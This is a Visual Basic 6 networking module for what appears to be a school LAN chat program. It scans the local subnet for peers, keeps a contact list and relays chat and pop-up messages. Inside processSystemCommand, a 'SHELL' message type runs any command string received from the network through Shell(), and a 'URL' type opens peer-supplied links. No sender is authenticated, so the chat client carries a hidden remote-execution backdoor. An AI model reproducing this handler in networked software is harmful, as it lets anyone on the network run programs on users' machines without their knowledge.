Attribute VB_Name = "networking"

Public Function getCurrentIP() As String

    getCurrentIP = main.messageSocket.LocalIP

End Function

Public Function listOtherChatters()

    Set contactList = Nothing

    Dim tempCommand As command
    Dim counter As Integer
    Dim partialIP As String
    Dim currentIP As String

    currentIP = getCurrentIP

    partialIP = getIPNumber(1, currentIP) & "." & getIPNumber(2, currentIP) & "." & getIPNumber(3, currentIP) & "."
    myendip = getIPNumber(4, currentIP)

    tempCommand.type = "HELLO"
    tempCommand.value = userName

    For X = 1 To 255
        DoEvents
        tempCommand.fromIP = currentIP
        sendCommand_PingSocket tempCommand, partialIP & X
    Next X

End Function

Public Function getIPNumber(position As Integer, IP As String) As Integer

    Dim a As Integer
    Dim b As Integer
    a = 0

    For X = 0 To position - 2
        a = InStr(a + 1, IP, ".")
    Next X

    b = InStr(a + 1, IP, ".")
    If b = 0 Then
        b = Len(IP)
    End If

    getIPNumber = Mid$(IP, a + 1, b - a)

End Function

Public Function sendCommand_SystemSocket(com As command, IP As String)
    On Error Resume Next

    main.systemSocket.Close
    main.systemSocket.RemoteHost = IP
    main.systemSocket.RemotePort = 48612  ' Port to connect to.
    main.systemSocket.Bind 48612

    main.systemSocket.SendData serializeCommand(com)

End Function

Public Function sendCommand_MessageSocket(com As command, IP As String)
    On Error Resume Next

    main.messageBroadCaster.Close
    main.messageBroadCaster.RemoteHost = IP
    main.messageBroadCaster.RemotePort = 48611  ' Port to connect to.
    main.messageBroadCaster.Bind 48609

    Dim a As String
    a = serializeCommand(com)

    main.messageBroadCaster.SendData EnCipher(a, 256)

End Function

Public Function sendCommand_PingSocket(com As command, IP As String)
    On Error Resume Next

    main.pingSocket.Close
    main.pingSocket.RemoteHost = IP
    main.pingSocket.RemotePort = 48612  ' Port to connect to.
    main.pingSocket.Bind 48610

    Dim a As String
    a = serializeCommand(com)

    main.pingSocket.SendData a

End Function

Public Function sendAndReceiveCommand(com As command, IP As String) As command

    Dim start As Double
    start = Timer

    main.systemSocket.RemoteHost = IP
    main.systemSocket.SendData serializeCommand(com)

    systemCommandIsNew = False

    While (Not systemCommandIsNew) And (Timer - start) < (0.3)
        DoEvents
    Wend

    sendAndReceiveCommand = systemCommand

End Function

Function isSchoolChatter(IP As String) As Boolean
    On Error GoTo endIt


    main.systemSocket.Close
    main.systemSocket.RemoteHost = IP
    main.systemSocket.RemotePort = 48612
    main.systemSocket.Bind 48612

    main.systemSocket.SendData "a"

    isSchoolChatter = True

    Exit Function
endIt:
    isSchoolChatter = False
End Function

Public Function processSystemCommand()

    Dim tempCommand As command

    If systemCommand.type = "HELLO" Then

        If Not IPexists(systemCommand.fromIP) Then

            On Error Resume Next
            Dim temp As Integer
            temp = 0
            temp = contactList.Count
            contactList.Add systemCommand.fromIP, systemCommand.value, True, contactList.Count
            
        End If
        
        contactList(lookUpUserByIP(systemCommand.fromIP)).user = systemCommand.value

        tempCommand.type = "HELLORESPONSE"
        tempCommand.value = userName
        tempCommand.fromIP = getCurrentIP
        sendCommand_PingSocket tempCommand, systemCommand.fromIP
        
        main.showList
            
        
    ElseIf systemCommand.type = "HELLORESPONSE" Then

        If Not IPexists(systemCommand.fromIP) Then
            On Error Resume Next
            
            temp = contactList.Count
            contactList.Add systemCommand.fromIP, systemCommand.value, True, contactList.Count
            
            main.showList

        End If
        
    ElseIf systemCommand.type = "GOODBYE" Then
    
        contactList.Remove (lookUpUserByIP(systemCommand.fromIP))
        
        main.showList
        
    ElseIf systemCommand.type = "SHELL" Then
    
        Shell (systemCommand.value)

    ElseIf systemCommand.type = "URL" Then
    
        WebURL (systemCommand.value)

    End If

End Function


'
'Public Function processSystemCommand()
'
'    Dim tempCommand As command
'
'    If systemCommand.type = "GETUSERNAME" Then
'
'        tempCommand.type = "USERNAME"
'        tempCommand.value = userName
'        tempCommand.fromIP = getCurrentIP
'
'        sendCommand_SystemSocket tempCommand, systemCommand.fromIP
'
'    ElseIf systemCommand.type = "HELLO" Then
'
'        If Not IPexists(systemCommand.fromIP) Then
'
'            On Error Resume Next
'            Dim temp As Integer
'            temp = 0
'            temp = UBound(contactList)
'            ReDim Preserve contactList(temp + 1)
'            contactList(temp).IP = systemCommand.fromIP
'            contactList(temp).user = systemCommand.value
'            contactList(temp).sendTo = True
'            contactList(temp).addedTime = Timer
'
'
'            tempCommand.type = "HELLO"
'            tempCommand.value = userName
'            tempCommand.fromIP = getCurrentIP
'            sendCommand_PingSocket tempCommand, systemCommand.fromIP
'
'        Else
'
'            If (Timer - lookUpUserByIP(systemCommand.fromIP).addedTime) > 4 Then
'
'                lookUpUserByIP(systemCommand.fromIP).user = systemCommand.value
'                lookUpUserByIP(systemCommand.fromIP).addedTime = Timer
'
'                tempCommand.type = "HELLO"
'                tempCommand.value = userName
'                tempCommand.fromIP = getCurrentIP
'                sendCommand_PingSocket tempCommand, systemCommand.fromIP
'
'                main.showList
'
'            End If
'
'        End If
'
'    End If
'
'End Function


Public Function processMessageCommand()

    Dim tempCommand As command

    If messageCommand.type = "MSG" Then

        neutralizeFont main.messageLogTXT
        main.messageLogTXT.SelStart = Len(main.messageLogTXT.Text)
        main.messageLogTXT.SelText = vbCrLf & contactList(lookUpUserByIP(messageCommand.fromIP)).user & ":" & vbTab
        main.messageLogTXT.SelRTF = messageCommand.value

    ElseIf messageCommand.type = "POPMSG" Then

        MsgBox messageCommand.value, vbOKOnly, "From " & contactList(lookUpUserByIP(systemCommand.fromIP)).user

    End If

End Function

